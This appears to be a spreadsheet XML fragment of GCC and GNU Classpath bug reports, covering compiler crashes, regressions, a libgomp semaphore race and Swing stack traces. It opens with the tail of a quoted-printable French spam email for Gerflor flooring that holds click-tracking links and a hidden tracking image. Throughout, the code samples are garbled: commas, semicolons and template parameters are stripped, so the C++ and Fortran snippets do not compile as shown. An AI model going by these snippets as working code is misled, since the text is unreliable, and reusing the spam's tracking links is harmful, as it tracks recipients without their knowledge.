  codebase=3Dhttp://download=2Emacromedia=2Ecom/pub/shockwave/cabs/flas=
 h/swflash=2Ecab#version=3D4020 width=3D600 height=3D200&gt;
   &lt;param name=3Dmovie=
  value=3Dhttp://213=2E130=2E54=2E121/operamail/gerflor/images/mot_croise=
 s=2Eswf&gt;
   &lt;embed=
  src=3Dhttp://213=2E130=2E54=2E121/operamail/gerflor/images/mot_croises=2E=
 swf quality=3Dhigh=
  pluginspage=3Dhttp://www=2Emacromedia=2Ecom/shockwave/download/index=2E=
 cgi?P1_Prod_Version=3DShockwaveFlash=
  type=3Dapplication/x-shockwave-flash width=3D600 height=3D200&gt;
 =09&lt;img=
  src=3Dhttp://213=2E130=2E54=2E121/operamail/gerflor/images/logos/espace=
 ur=2Egif width=3D1 height=3D381&gt;
 =09&lt;TD COLSPAN=3D6=
  background=3Dhttp://213=2E130=2E54=2E121/operamail/gerflor/images/logos=
 /santeh=2Ejpg valign=3Dtop&gt; 
 =09  &lt;table width=3D100% border=3D0 cellspacing=3D0=
  cellpadding=3D0&gt;
 =09=09 
 =09=09  &lt;font face=3DVerdana Arial Helvetica=
  sans-serif size=3D2&gt; 
 =09=09=09Bonjour  
 =09=09=09
 =09=09=09Vous cherchez des &lt;font=
  size=3D3&gt;solutions 
 =09=09=09vraiment adapt=E9es ?
 =09=09=09V=E9rifiez ou vous mettez les pieds=2E 
 =09=09
 =09=09 
 =09=09  &lt;img=
  src=3Dhttp://213=2E130=2E54=2E121/operamail/gerflor/images/logos/espace=
 ur=2Egif width=3D320 height=3D150&gt;
 =09=09  
 =09=09
 =09=09 
 =09=09  
 =09=09  
 =09=09=09&lt;font face=3DVerdana Arial Helvetica=
  sans-serif size=3D2&gt;Avec plus de 30 millions de m2=
  poss dans le secteur de la sant Gerflor est=
  devenu un vritable expert dans ce domaine=2ESa=
  large gamme de produits avec des sols isophoniques=
  Taralay des sols lectroconducteurs Mipolam=
  EL et le systme douche Taradouche correspond=
  parfaitement aux exigences d'hygine d'entretien et de=
  durabilit en milieu=
  hospitalier=2ERevtements de sols pour le sport=
  et le btiment=2E
 =09=09=09  
 =09=09  
 =09=09
 =09  
 =09
 =09&lt;img=
  src=3Dhttp://213=2E130=2E54=2E121/operamail/gerflor/images/logos/espace=
 ur=2Egif width=3D1 height=3D119&gt;
 =09&lt;a=
  href=3Dhttp://213=2E130=2E54=2E121/operamail/gerflor/usr/url=2Easp?ca=3D363=
 &amp;l=3D1&amp;cl=3D76503&amp;url=3Dhttp://213=2E130=2E54=2E121/operamail/gerflor/usr/fr/=
 modif_s=2Easp?mail=3Dgcc-gnats@gcc=2Egnu=2Eorg alt=3DPour toute demande=
  cliquez ici&gt;&lt;IMG=
  SRC=3Dhttp://213=2E130=2E54=2E121/operamail/gerflor/images/logos/sante=2E=
 jpg WIDTH=3D600 HEIGHT=3D144 border=3D0&gt;&lt;td=
  colspan=3D6 align=3Dcenter&gt;&lt;font face=3DVerdana Arial Helvetica=
  sans-serif size=3D2&gt;&lt;a=
  href=3Dhttp://213=2E130=2E54=2E121/operamail/gerflor/usr/url=2Easp?ca=3D363=
 &amp;l=3D2&amp;cl=3D76503&amp;url=3Dhttp://213=2E130=2E54=2E121/operamail/gerflor/usr/fr/=
 modif_s=2Easp?mail=3Dgcc-gnats@gcc=2Egnu=2Eorg&gt;Pour toute demande=
  cliquez ici
 &lt;table border=3D0 cellspacing=3D0 cellpading=3D0=
  width=3D100%&gt;
 &lt;font face=3DVerdana Arial Helvetica=
  sans-serif&gt;Gerflor -
 Direction commerciale
 43 boulevard Garibaldi
 69170 TARARE
 T=E9l : 04 74 05 40 00
 Fax : 04 74 05 07 58
 &lt;a=
  href=3D'http://213=2E130=2E54=2E121/operamail/gerflor/usr/url=2Easp?ca=3D363=
 &amp;l=3D3&amp;cl=3D76503&amp;url=3Dhttp://www=2Egerflor=2Ecom'=
  target=3D'_blank'&gt;www=2Egerflor=2Ecom
 &lt;img=
  src=3Dhttp://213=2E130=2E54=2E121/operamail/gerflor/images/logos/logoba=
 s=2Egif align=3D&gt;
 &lt;img=
  src=3Dhttp://213=2E130=2E54=2E121/operamail/gerflor/usr/detect_mail=2Easp=
 ?ca=3D363&amp;cl=3D76503 width=3D0=
  height=3D0&gt;
 ------xxxxxx--
Release:
unknown</t>
  </si>
  <si>
    <t>gerflor</t>
  </si>
  <si>
    <t>GCC-3831</t>
  </si>
  <si>
    <t>problem with forward declaration of function taking a reference to a generic member</t>
  </si>
  <si>
    <t>g++ considers the forward declaration of a function taking a reference to a generic member and the definition of this function as two different declarations.
It issues the error ``call of overloaded ... is ambiguous''.
Example with g++ 2.95.3 bug also reproduced with g++ 3.0
gag237:cpp/bug $ more typename-light.cpp 
template  struct A
template  void g(typename A::B
template  struct A {
   template  struct B { }
}
template  void g(typename A::B
int main() {
   A::B b
   g(b)
}
gag237:cpp/bug $ g++ -Wall -ansi -pedantic -W -O2 typename-light.cpp
typename-light.cpp: In function `int main()':
typename-light.cpp:12: call of overloaded `g (A::B &amp;)' is ambiguous
typename-light.cpp:2: candidates are: void g(A::B &amp;)
typename-light.cpp:8:                 void g(A::B &amp;)
gag237:cpp/bug $ g++ --version
2.95.3
gag237:cpp/bug $ ~//linux/bin/g++ -Wall -W -ansi -pedantic -O2 -static -I/gagax6/ur3/lachaume/indep/include/g++-3.0 -I/gagax6/ur3/lachaume/indep/include/g++-3.0/i686-pc-linux-gnu/ -o typename typename.cpp
typename.cpp: In function `int main()':
typename.cpp:26: call of overloaded `g(A::B&amp;)' is ambiguous
typename.cpp:13: candidates are: void g(typename A::B&amp;) [with u = int v 
   = float]
typename.cpp:20:                 void g(A::B&amp;) [with u = int v = float]
typename.cpp:27: call of overloaded `h(A::B&amp;)' is ambiguous
typename.cpp:14: candidates are: void h(typename A::B&amp;) [with u = int v 
   = float]
typename.cpp:21:                 void h(const A::B&amp;) [with u = int v = 
   float]
gag237:cpp/bug $ ~/linux/bin/g++ --version
3.0
gag237:cpp/bug $
Other problems: 
* a missing typenames in the definition is not diagnosed with the -pedantic option.
* g++ v &gt;= 3.0 ignores an eventual const qualifier in the forward declaration when reporting the error whereas g++ 2.95.3 does it correctly
A full example file is attached.
Release:
3.0 (release) and prior versions
Environment:
gag237:cpp/bug $ uname -a
Linux gag237 2.4.0-test10 #3 mer dÃ©c 6 11:59:57 CET 2000 i686 unknown
gag237:cpp/bug $ ~/linux/bin/g++ -v
Reading specs from /gagax6/ur3/lachaume/linux/lib/gcc-lib/i686-pc-linux-gnu/3.0/specs
Configured with: ../configure --prefix=/gagax6/ur3/lachaume/indep --exec-prefix=/gagax6/ur3/lachaume/linux --enable-languages=cc++ : (reconfigured) ../configure --prefix=/gagax6/ur3/lachaume/indep --exec-prefix=/gagax6/ur3/lachaume/linux --enable-languages=c++ --with-gxx-include-dir=/gagax6/ur3/lachaume/indep/include/g++ --with-local-prefix=/gagax6/ur3/lachaume/indep/
Thread model: single
gcc version 3.0
gag237:cpp/bug $ g++ -v
Reading specs from /usr/lib/gcc-lib/i586-mandrake-linux/2.95.3/specs
gcc version 2.95.3 19991030 (prerelease)
gag237:cpp/bug $</t>
  </si>
  <si>
    <t>lachaume</t>
  </si>
  <si>
    <t>GCC-70858</t>
  </si>
  <si>
    <t>__builtin_ia32_bextr_u64 ICE with '-m32 -march=core-avx2'</t>
  </si>
  <si>
    <t>$ gcc -v
Using built-in specs.
COLLECT_GCC=/usr/bin/gcc
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-unknown-linux-gnu/6.1.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: /build/gcc-multilib/src/gcc-6.1.0/configure --host=x86_64-unknown-linux-gnu --build=x86_64-unknown-linux-gnu --target=x86_64-unknown-linux-gnu --prefix=/usr --libdir=/usr/lib --libexecdir=/usr/lib --mandir=/usr/share/man --infodir=/usr/share/info --with-bugurl=https://www.uplinklabs.net/ --enable-languages=cc++adafortrangoltoobjcobj-c++ --disable-libssp --disable-libstdcxx-pch --disable-libunwind-exceptions --disable-werror --enable-checking=release --enable-clocale=gnu --enable-__cxa_atexit --enable-gnu-indirect-function --enable-gnu-unique-object --enable-install-libiberty --enable-libmpx --enable-linker-build-id --enable-lto --enable-multilib --enable-plugin --enable-shared --enable-threads=posix --with-isl --with-linker-hash-style=gnu --with-multilib-list=m32m64mx32 --with-system-zlib
Thread model: posix
gcc version 6.1.0 (GCC)
Reduced testcase via creduce:
$ cat test.i
int a b c
int d() { c = __builtin_ia32_bextr_u64(a b) }
$ gcc -m32 -march=core-avx2 -c test.i
test.i: In function â€˜dâ€™:
test.i:2:1: error: unrecognizable insn:
 int d() { c = __builtin_ia32_bextr_u64(a b) }
 ^~~
(insn 9 8 10 2 (parallel [
            (set (reg:DI 91 [ _6 ])
                (unspec:DI [
                        (reg:DI 90 [ _5 ])
                        (reg:DI 88 [ _3 ])
                    ] UNSPEC_BEXTR))
            (clobber (reg:CC 17 flags))
        ]) test.i:2 -1
     (nil))
test.i:2:1: internal compiler error: in extract_insn at recog.c:2287</t>
  </si>
  <si>
    <t>GCC-31867</t>
  </si>
  <si>
    <t>[4.2 only] function result with character LEN computed at run time</t>
  </si>
  <si>
    <t>The program
module util_mod
implicit none
contains
function join(wordssep) result(str)
! trim and concatenate a vector of character variables 
! inserting sep between them
character (len=*) intent(in)        :: words(:)sep
character (len=(size(words)-1)*len(sep) + sum(len_trim(words))) :: str
integer                              :: inw
nw  = size(words)
str = 
if (nw &lt; 1) then
   return
else
   str = words(1)
end if
do i=2nw
   str = trim(str) // sep // words(i)
end do
end function join
end module util_mod
!
program xjoin
use util_mod only: join
implicit none
character (len=5) :: words(2) = (/two  three/) 
write (*(1x'words = 'a)) '//join(words )//'
end program xjoin
gives
 words = 'two threeg9'
but I think it should give
 words = 'two three'
gfortran -v says
Using built-in specs.
Target: i386-pc-mingw32
Configured with: ../trunk/configure --prefix=/mingw --enable-languages=cfortranc++objcobj-c++ --with-gmp=/home/coudert/local --disable-nls --with-ld=/mingw/bin/ld --with-as=/mingw/bin/as --disable-werror --enable-bootstrap --enable-threads --build=i386-pc-mingw32 --disable-shared --enable-libgomp
Thread model: win32
gcc version 4.3.0 20070406 (experimental)</t>
  </si>
  <si>
    <t>beliavsky</t>
  </si>
  <si>
    <t>GCC-22597</t>
  </si>
  <si>
    <t>[4.0 Regression] pure attribute produces incorrect results</t>
  </si>
  <si>
    <t>In the attached code the pure attribute is causing the result to be random/junk
on the final calculation in main.  According to the docs the function seems to
qualify for pure status -- it uses only the parameters given.   It does however
create a temporary (but as this exists on the stack I assumed it is okay since
it still doesn't violate the notion of being pure).
Expected result (with -DNOATTRIB or -DNOCOPYCTOR flags):
5 5
1 1
Actual Result (compiled with g++ -o test point_err.cc):
5 5
338848 4.85849e-270
(NOTE: Worked on 3.3)
It is curious also that no declaring the copy constructor also allows this code
to work with the pure attribute.
So either this is a bug in the 4.0 pure handling or the documentation for
pure is omitting some vital point which my code violates.</t>
  </si>
  <si>
    <t>eda-qa</t>
  </si>
  <si>
    <t>CLASSPATH-29190</t>
  </si>
  <si>
    <t>epoll channel already registered - in Azureus</t>
  </si>
  <si>
    <t>Running Azureus with CVS HEAD 20060923 and epoll NIO selector implementation on download I see repeated:
DEBUG::Sat Sep 23 10:47:13 GMT 2006::com.aelitis.azureus.core.networkmanager.impl.VirtualChannelSelectorImpl::select::415:
  java.lang.IllegalArgumentException: channel already registered
   at gnu.java.nio.EpollSelectorImpl.register(EpollSelectorImpl.java:232)
   at java.nio.channels.spi.AbstractSelectableChannel.register(AbstractSelectableChannel.java:242)
   at com.aelitis.azureus.core.networkmanager.impl.VirtualChannelSelectorImpl.select(VirtualChannelSelectorImpl.java:397)
   at com.aelitis.azureus.core.networkmanager.VirtualChannelSelector.select(VirtualChannelSelector.java:272)
   at com.aelitis.azureus.core.networkmanager.impl.ConnectDisconnectManager.runSelect(ConnectDisconnectManager.java:354)
   at com.aelitis.azureus.core.networkmanager.impl.ConnectDisconnectManager.mainLoop(ConnectDisconnectManager.java:107)
   at com.aelitis.azureus.core.networkmanager.impl.ConnectDisconnectManager.access$2(ConnectDisconnectManager.java:104)
   at com.aelitis.azureus.core.networkmanager.impl.ConnectDisconnectManager$2.runSupport(ConnectDisconnectManager.java:96)
   at org.gudy.azureus2.core3.util.AEThread.run(AEThread.java:69)
   at java.lang.VMThread.run(VMThread.java:120)
This is with Cacao HEAD on FC5 x86 (FC shipped Linux kernel 2.6.17 and glibc 2.4).</t>
  </si>
  <si>
    <t>psj</t>
  </si>
  <si>
    <t>GCC-69104</t>
  </si>
  <si>
    <t>invalid atomic memory order not diagnosed</t>
  </si>
  <si>
    <t>Gcc silently accepts invocations of C11 atomic operations with an invalid memory_order argument.  For example it doesn't diagnose any of the invalid calls in the test case below (and emits fences for most).
In contrast Clang issues warning: memory order argument to atomic operation is invalid [-Watomic-memory-ordering] for each of them and treats them as no-ops.
$ cat z.c &amp;&amp; /home/msebor/build/gcc-trunk-svn/gcc/xgcc -B/home/msebor/build/gcc-trunk-svn/gcc -O2 -S -Wall -Wextra -Wpedantic -o/dev/null z.c
#include 
/* atomic_store_explicit():
   The order argument shall not be memory_order_acquire
   memory_order_consume nor memory_order_acq_rel.  */
void store_consume (_Atomic int *i)
{
  atomic_store_explicit (i 0 memory_order_consume)
}
void store_acquire (_Atomic int *i)
{
  atomic_store_explicit (i 0 memory_order_acquire)
}
void store_acq_rel (_Atomic int *i)
{
  atomic_store_explicit (i 0 memory_order_acq_rel)
}
/* atomic_load_explicit():
   The order argument shall not be memory_order_release nor
   memory_order_acq_rel.  */
int load_consume (_Atomic int *i)
{
  return atomic_load_explicit (i memory_order_release)
}
int load_acq_rel (_Atomic int *i)
{
  return atomic_load_explicit (i memory_order_acq_rel)
}</t>
  </si>
  <si>
    <t>GCC-80001</t>
  </si>
  <si>
    <t>diagnostics: untranslateable %s placeholders in omp-offload.c</t>
  </si>
  <si>
    <t>from omp-offload.c:
error_at (loop-&gt;loc
          %s uses same OpenACC parallelism as containing loop
          loop-&gt;routine ? routine call : inner loop)
The %s placeholder cannot be translated into other languages but should be. Therefore the ?: should be replaced with a ?: for the whole sentence.
error_at (loop-&gt;loc loop-&gt;routine
          ? routine call uses same OpenACC parallelism as containing loop
          : inner loop uses same OpenACC parallelism as containing loop)</t>
  </si>
  <si>
    <t>GCC-6839</t>
  </si>
  <si>
    <t>ICE on illegal explicit member function instantiation syntax</t>
  </si>
  <si>
    <t>I'm not 100% sure if the following is correct C++ but it causes an ICE
nonetheless.
Release:
3.1 (Debian)
Environment:
System: Linux sammakko 2.4.17 #10 Sat Dec 29 12:59:59 EET 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: /mnt/data/gcc-3.1/gcc-3.1-3.1ds2/src/configure -v --enable-languages=cc++javaf77protoobjcada --prefix=/usr --mandir=$(prefix)/share/man --infodir=$(prefix)/share/info --with-gxx-include-dir=$(prefix)/include/g++-v3-3.1 --enable-shared --with-system-zlib --enable-long-long --enable-nls --without-included-gettext --enable-clocale=gnu --enable-threads=posix --enable-java-gc=boehm --enable-objc-gc i386-linux
How-To-Repeat:
class Cyborg {}
class MapCell {}
template 
class Map {}
template  class Hivemain
template 
class Hivemain {
public:
  void commloop()
}
template 
void Hivemain::commloop(){}
template void Hivemain::commloop
bash-2.05a$ g++-3.1 gccbug.cc
gccbug.cc:17: Internal compiler error.
gccbug.cc:17: Please submit a full bug report.
gccbug.cc:17: Internal compiler error:
gccbug.cc:17: See  for instructions.</t>
  </si>
  <si>
    <t>kari</t>
  </si>
  <si>
    <t>GCC-24755</t>
  </si>
  <si>
    <t>[4.0/4.1 Regression] internal compiler error with statement function</t>
  </si>
  <si>
    <t>internal compiler error 
subroutine nhatgrid()
 implicit none
 integer :: lambda
 real(kind=8) :: argsigma
 real(kind=8) :: dshpfunc
 dshpfunc(arg)=-lambda/sigma*(arg/sigma)**(lambda-1)*exp(-(arg/sigma)**lambda)
end subroutine nhatgrid</t>
  </si>
  <si>
    <t>tdeutsch</t>
  </si>
  <si>
    <t>CLASSPATH-27407</t>
  </si>
  <si>
    <t>NullPointerException in javax.swing.text.WrappedPlainView$WrappedLine.getPreferredSpan()</t>
  </si>
  <si>
    <t>When running openjump in debian/unstable using jamvm and the CVS
version of classpath I get a NullPointException in
javax.swing.text.WrappedPlainView$WrappedLine.getPreferredSpan(WrappedPlainView.java:521)
when selecting 'Help-&gt;About' from the meny.
This is the output from an example run.  The JDOM exception is from
the start of the program but do not seem to be fatal.  The
NullPointerException is at the end.  After trying the About menu entry
I exited the program and it ended normally.
% JAVACMD=/usr/bin/jamvm JAVA_ARGS=-Dgnu.java.awt.peer.gtk.Graphics=Graphics2D -Xms256M -Xmx256M openjump
fireChangedUpdate not implemented
JUMP: Warning: Properties file does not exist: /usr/share/openjump/workbench-properties.xml
JUMP: Warning: Extensions directory does not exist: /usr/share/openjump/ext
org.jdom.input.JDOMParseException: Error on line 2: required string: ?&gt;
   at org.jdom.input.SAXBuilder.build(SAXBuilder.java:381)
   at org.jdom.input.SAXBuilder.build(SAXBuilder.java:764)
   at com.vividsolutions.jump.util.java2xml.XML2Java.read(XML2Java.java:61)
   at com.vividsolutions.jump.workbench.ui.plugin.PersistentBlackboardPlugIn.restoreState(PersistentBlackboardPlugIn.java:73)
   at com.vividsolutions.jump.workbench.ui.plugin.PersistentBlackboardPlugIn.initialize(PersistentBlackboardPlugIn.java:52)
   at com.vividsolutions.jump.workbench.JUMPConfiguration.initializeBuiltInPlugIns(JUMPConfiguration.java:988)
   at com.vividsolutions.jump.workbench.JUMPConfiguration.setup(JUMPConfiguration.java:269)
   at com.vividsolutions.jump.workbench.JUMPWorkbench.main(JUMPWorkbench.java:234)
   at com.vividsolutions.jump.workbench.JUMPWorkbench.main(JUMPWorkbench.java:200)
Caused by: org.xml.sax.SAXParseException: required string: ?&gt;
   at gnu.xml.stream.SAXParser.parse(SAXParser.java:660)
   at org.jdom.input.SAXBuilder.build(SAXBuilder.java:370)
   ...8 more
Caused by: javax.xml.stream.XMLStreamException: required string: ?&gt;
   at gnu.xml.stream.XMLParser.error(XMLParser.java:4053)
   at gnu.xml.stream.XMLParser.require(XMLParser.java:1291)
   at gnu.xml.stream.XMLParser.readXMLDecl(XMLParser.java:1716)
   at gnu.xml.stream.XMLParser.next(XMLParser.java:1121)
   at gnu.xml.stream.XMLParser.hasNext(XMLParser.java:984)
   at gnu.xml.stream.SAXParser.parse(SAXParser.java:377)
   ...9 more
Caused by: org.xml.sax.SAXParseException: required string: ?&gt;
   at gnu.xml.stream.SAXParser.parse(SAXParser.java:660)
   at org.jdom.input.SAXBuilder.build(SAXBuilder.java:370)
   at org.jdom.input.SAXBuilder.build(SAXBuilder.java:764)
   at com.vividsolutions.jump.util.java2xml.XML2Java.read(XML2Java.java:61)
   at com.vividsolutions.jump.workbench.ui.plugin.PersistentBlackboardPlugIn.restoreState(PersistentBlackboardPlugIn.java:73)
   at com.vividsolutions.jump.workbench.ui.plugin.PersistentBlackboardPlugIn.initialize(PersistentBlackboardPlugIn.java:52)
   at com.vividsolutions.jump.workbench.JUMPConfiguration.initializeBuiltInPlugIns(JUMPConfiguration.java:988)
   at com.vividsolutions.jump.workbench.JUMPConfiguration.setup(JUMPConfiguration.java:269)
   at com.vividsolutions.jump.workbench.JUMPWorkbench.main(JUMPWorkbench.java:234)
   at com.vividsolutions.jump.workbench.JUMPWorkbench.main(JUMPWorkbench.java:200)
Caused by: javax.xml.stream.XMLStreamException: required string: ?&gt;
   at gnu.xml.stream.XMLParser.error(XMLParser.java:4053)
   at gnu.xml.stream.XMLParser.require(XMLParser.java:1291)
   at gnu.xml.stream.XMLParser.readXMLDecl(XMLParser.java:1716)
   at gnu.xml.stream.XMLParser.next(XMLParser.java:1121)
   at gnu.xml.stream.XMLParser.hasNext(XMLParser.java:984)
   at gnu.xml.stream.SAXParser.parse(SAXParser.java:377)
   ...9 more
java.lang.NullPointerException
   at javax.swing.text.WrappedPlainView$WrappedLine.getPreferredSpan(WrappedPlainView.java:521)
   at javax.swing.text.View.getMinimumSpan(View.java:183)
   at javax.swing.text.BoxView.updateChildRequirements(BoxView.java:948)
   at javax.swing.text.BoxView.layoutMajorAxis(BoxView.java:700)
   at javax.swing.text.BoxView.layout(BoxView.java:671)
   at javax.swing.text.BoxView.modelToView(BoxView.java:865)
   at javax.swing.plaf.basic.BasicTextUI$RootView.modelToView(BasicTextUI.java:286)
   at javax.swing.plaf.basic.BasicTextUI.modelToView(BasicTextUI.java:1204)
   at javax.swing.plaf.basic.BasicTextUI.damageRange(BasicTextUI.java:1029)
   at javax.swing.plaf.basic.BasicTextUI.damageRange(BasicTextUI.java:998)
   at javax.swing.text.DefaultHighlighter.addHighlight(DefaultHighlighter.java:264)
   at javax.swing.text.DefaultCaret.clearHighlight(DefaultCaret.java:725)
   at javax.swing.text.DefaultCaret.setDotImpl(DefaultCaret.java:1054)
   at javax.swing.text.DefaultCaret.setDot(DefaultCaret.java:1041)
   at javax.swing.text.DefaultCaret$DocumentHandler.removeUpdate(DefaultCaret.java:187)
   at javax.swing.text.AbstractDocument.fireRemoveUpdate(AbstractDocument.java:318)
   at javax.swing.text.AbstractDocument.removeImpl(AbstractDocument.java:741)
   at javax.swing.text.AbstractDocument.remove(AbstractDocument.java:723)
   at javax.swing.JEditorPane.setText(JEditorPane.java:928)
   at com.vividsolutions.jump.workbench.ui.ExtensionsAboutPanel.jbInit(ExtensionsAboutPanel.java:76)
   at com.vividsolutions.jump.workbench.ui.ExtensionsAboutPanel.(ExtensionsAboutPanel.java:52)
   at com.vividsolutions.jump.workbench.ui.AboutDialog.(AboutDialog.java:109)
   at com.vividsolutions.jump.workbench.ui.AboutDialog.instance(AboutDialog.java:102)
   at com.vividsolutions.jump.workbench.ui.plugin.AboutPlugIn.execute(AboutPlugIn.java:48)
   at com.vividsolutions.jump.workbench.plugin.AbstractPlugIn$1.actionPerformed(AbstractPlugIn.java:130)
   at com.vividsolutions.jump.workbench.ui.plugin.FeatureInstaller$6$1.run(FeatureInstaller.java:553)
   at java.awt.event.InvocationEvent.dispatch(InvocationEvent.java:200)
   at java.awt.EventQueue.dispatchEvent(EventQueue.java:465)
   at java.awt.EventDispatchThread.run(EventDispatchThread.java:75)
java.lang.NullPointerException
   at javax.swing.text.WrappedPlainView$WrappedLine.getPreferredSpan(WrappedPlainView.java:521)
   at javax.swing.text.View.getMinimumSpan(View.java:183)
   at javax.swing.text.BoxView.updateChildRequirements(BoxView.java:948)
   at javax.swing.text.BoxView.layoutMajorAxis(BoxView.java:700)
   at javax.swing.text.BoxView.layout(BoxView.java:671)
   at javax.swing.text.BoxView.modelToView(BoxView.java:865)
   at javax.swing.plaf.basic.BasicTextUI$RootView.modelToView(BasicTextUI.java:286)
   at javax.swing.plaf.basic.BasicTextUI.modelToView(BasicTextUI.java:1204)
   at javax.swing.plaf.basic.BasicTextUI.damageRange(BasicTextUI.java:1029)
   at javax.swing.plaf.basic.BasicTextUI.damageRange(BasicTextUI.java:998)
   at javax.swing.text.DefaultHighlighter.addHighlight(DefaultHighlighter.java:264)
   at javax.swing.text.DefaultCaret.clearHighlight(DefaultCaret.java:725)
   at javax.swing.text.DefaultCaret.setDotImpl(DefaultCaret.java:1054)
   at javax.swing.text.DefaultCaret.setDot(DefaultCaret.java:1041)
   at javax.swing.text.DefaultCaret$DocumentHandler.removeUpdate(DefaultCaret.java:187)
   at javax.swing.text.AbstractDocument.fireRemoveUpdate(AbstractDocument.java:318)
   at javax.swing.text.AbstractDocument.removeImpl(AbstractDocument.java:741)
   at javax.swing.text.AbstractDocument.remove(AbstractDocument.java:723)
   at javax.swing.JEditorPane.setText(JEditorPane.java:928)
   at com.vividsolutions.jump.workbench.ui.ExtensionsAboutPanel.setPlugInManager(ExtensionsAboutPanel.java:70)
   at com.vividsolutions.jump.workbench.ui.AboutDialog.(AboutDialog.java:113)
   at com.vividsolutions.jump.workbench.ui.AboutDialog.instance(AboutDialog.java:102)
   at com.vividsolutions.jump.workbench.ui.plugin.AboutPlugIn.execute(AboutPlugIn.java:48)
   at com.vividsolutions.jump.workbench.plugin.AbstractPlugIn$1.actionPerformed(AbstractPlugIn.java:130)
   at com.vividsolutions.jump.workbench.ui.plugin.FeatureInstaller$6$1.run(FeatureInstaller.java:553)
   at java.awt.event.InvocationEvent.dispatch(InvocationEvent.java:200)
   at java.awt.EventQueue.dispatchEvent(EventQueue.java:465)
   at java.awt.EventDispatchThread.run(EventDispatchThread.java:75)
%</t>
  </si>
  <si>
    <t>GCC-34797</t>
  </si>
  <si>
    <t>[parallel mode] Settings are separated for each compilation unit</t>
  </si>
  <si>
    <t>In settings.h the Settings class (containing only static variables) is encapsulated in an anonymous namespace. This makes the linker think of a distinct class for each compilation unit. As as result settings changed in one .cpp file won't affect code from another .cpp file although they should have global effect.</t>
  </si>
  <si>
    <t>singler</t>
  </si>
  <si>
    <t>GCC-82301</t>
  </si>
  <si>
    <t>[8 regression] Updated test case g++.dg/ext/attr-ifunc-1.C (and others) in r253041 segfault on powerpc64</t>
  </si>
  <si>
    <t>A bunch of test cases were updated at or just before r253041 and they fail on powerpc64.  Just BE LE works fine.
&gt; FAIL: g++.dg/ext/attr-ifunc-1.C  -std=gnu++11 execution test
&gt; FAIL: g++.dg/ext/attr-ifunc-1.C  -std=gnu++14 execution test
&gt; FAIL: g++.dg/ext/attr-ifunc-1.C  -std=gnu++98 execution test
&gt; FAIL: g++.dg/ext/attr-ifunc-2.C  -std=gnu++11 execution test
&gt; FAIL: g++.dg/ext/attr-ifunc-2.C  -std=gnu++14 execution test
&gt; FAIL: g++.dg/ext/attr-ifunc-2.C  -std=gnu++98 execution test
&gt; FAIL: g++.dg/ext/attr-ifunc-3.C  -std=gnu++11 execution test
&gt; FAIL: g++.dg/ext/attr-ifunc-3.C  -std=gnu++14 execution test
&gt; FAIL: g++.dg/ext/attr-ifunc-3.C  -std=gnu++98 execution test
&gt; FAIL: g++.dg/ext/attr-ifunc-4.C  -std=gnu++11 execution test
&gt; FAIL: g++.dg/ext/attr-ifunc-4.C  -std=gnu++14 execution test
&gt; FAIL: g++.dg/ext/attr-ifunc-4.C  -std=gnu++98 execution test
They seem to be segfaulting:
(gdb) run
Starting program: /home/seurer/gcc/build/gcc-test2/./attr-ifunc-1.exe 
Program received signal SIGSEGV Segmentation fault.
0x0000000010000680 in Klass::resolver () at /home/seurer/gcc/gcc-test2/gcc/testsuite/g++.dg/ext/attr-ifunc-1.C:26
26	  return 
(gdb) where
#0  0x0000000010000680 in Klass::resolver () at /home/seurer/gcc/gcc-test2/gcc/testsuite/g++.dg/ext/attr-ifunc-1.C:26
#1  0x00003fffb7fc2fb0 in resolve_ifunc (sym_map=0x3fffb7ff1ed0 map=0x3fffb7ff1ed0 value=) at ../sysdeps/powerpc/powerpc64/dl-machine.h:630
#2  elf_machine_rela (skip_ifunc= reloc_addr_arg=0x10010e88 version= sym= reloc=0x100003c0 map=0x3fffb7ff1ed0)
    at ../sysdeps/powerpc/powerpc64/dl-machine.h:691
#3  elf_dynamic_do_Rela (skip_ifunc= lazy= nrelative= relsize= reladdr= 
    map=0x3fffb7ff1ed0) at do-rel.h:137
#4  _dl_relocate_object (scope=0x3fffb7ff2248 reloc_mode= consider_profiling=) at dl-reloc.c:259
#5  0x00003fffb7fb73b8 in dl_main (phdr= phnum= user_entry=0x3fffffffea70 auxv=) at rtld.c:2313
#6  0x00003fffb7fd2634 in _dl_sysdep_start (start_argptr= dl_main=@0x3fffb7ff0140: 0x3fffb7fb5400 ) at ../elf/dl-sysdep.c:244
#7  0x00003fffb7fb3f48 in _dl_start_final (arg=arg@entry=0x3ffffffff150 info=info@entry=0x3fffffffebd0) at rtld.c:412
#8  0x00003fffb7fb4c28 in _dl_start (arg=0x3ffffffff150) at rtld.c:640
#9  0x00003fffb7fb3c10 in ._start () from /lib64/ld64.so.1
Some of these at least used to be marked as unsupported.</t>
  </si>
  <si>
    <t>seurer</t>
  </si>
  <si>
    <t>GCC-51249</t>
  </si>
  <si>
    <t>semaphore implemetation for linux leaves threads blocked</t>
  </si>
  <si>
    <t>Refer libgomp/config/linux/sem.[ch]
Threads A B C.  Initial sem value = 1.
A calls gomp_sem_wait successfully decrements sem to 0.
B calls gomp_set_wait drops into gomp_sem_wait_slow sets sem to -1
and blocks.
C calls gomp_set_wait and similarly blocks.  sem is -1.
A calls gomp_sem_post drops into gomp_sem_post_slow sets sem to 1
and wakes one thread lets say B.
B grabs sem sets it to 0.
B calls gomp_sem_post setting sem to 1 but does not wake up C.
With no more semaphore activity C stays blocked forever.
You might think that adding one to wake count would fix this
ie. waking one more thread than can successfully get the semaphore
with the idea that the failing thread will then set sem to -1 to flag
that some threads are waiting.  That doesn't work though.  Add one
more thread to the example above D that like C is blocked.  When A
wakes two threads B and C say B might get the sem then release it
before C runs.  Then C won't wake up D.</t>
  </si>
  <si>
    <t>GCC-34364</t>
  </si>
  <si>
    <t>[4.2 Regression] class&amp; is not known as as a class-type anymore after dynamic_cast</t>
  </si>
  <si>
    <t>The following code fails to compile
struct A {
    virtual ~A() {} //make A polymorphic
}
struct B: public A
{
    template 
    class C
    {
      public:
          static void f (A&amp; a)
          {
               dynamic_cast&lt;B
          }
    }
    void g () {}
}
... and issues the following Error message:
test.cpp: In static member function 'static void B::Update::g(A&amp;)':
test.cpp:21: error: request for member 'g' in 'dynamic_cast(a)' which is of non-class type 'B&amp;'
On the other hand it works if either C is not a template or B is a template. 
this fails for 4.1.3 4.2.2 and 4.3.0</t>
  </si>
  <si>
    <t>rbuergel</t>
  </si>
  <si>
